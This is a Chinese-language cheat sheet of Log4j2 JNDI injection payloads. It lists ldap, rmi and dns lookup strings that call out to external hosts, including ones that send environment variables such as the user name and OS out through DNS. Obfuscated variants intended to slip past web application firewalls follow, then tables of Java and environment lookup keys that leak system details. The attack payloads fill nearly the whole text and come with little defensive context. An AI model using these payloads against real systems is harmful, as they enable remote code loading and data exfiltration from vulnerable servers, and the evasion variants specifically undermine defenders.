log4j2 支持很多协议,例如通过 ldap 查找变量,通过 docker 查找变量,从网上大家的测试来看,主要使用 ldap 来构造 payload,详细参考这里:
1.常用payload
${jndi:ldap://127.0.0.1:1389/ Badclassname}
${jndi:ldap://xxx.xxx.xxx.xxx/exp}
//Windows
${jndi:dns://${env:OS}.dnslog.com}
${jndi:dns://${env:USERNAME}.dnslog.com}
//过waf
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1:1389/Exploit.class}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
log4j-java
ID |
usage |
method |
1 |
${java:version} |
getSystemProperty(“java.version”) |
2 |
${java:runtime} |
getRuntime() |
3 |
${java:vm} |
getVirtualMachine() |
4 |
${java:os} |
getOperatingSystem() |
5 |
${java:hw} |
getHardware() |
6 |
${java:locale} |
getLocale() |
Linux
id |
usage |
1 |
${env:CLASSPATH} |
2 |
${env:HOME} |
3 |
${env:JAVA_HOME} |
4 |
${env:LANG} |
5 |
${env:LOGNAME} |
6 |
${env:MAIL} |
7 |
${env:PATH} |
8 |
${env:PWD} |
9 |
${env:SHELL} |
10 |
${env:USER} |
Windows
id |
usage |
1 |
${env:A8_HOME} |
2 |
${env:A8_ROOT_BIN} |
3 |
${env:CLASSPATH} |
4 |
${env:JRE_HOME} |
5 |
${env:Java_Home} |
6 |
${env:LOGONSERVER} |
7 |
${env:OS} |
8 |
${env:Path} |
9 |
${env:USERDOMAIN} |
10 |
${env:USERNAME} |
log4j2-sys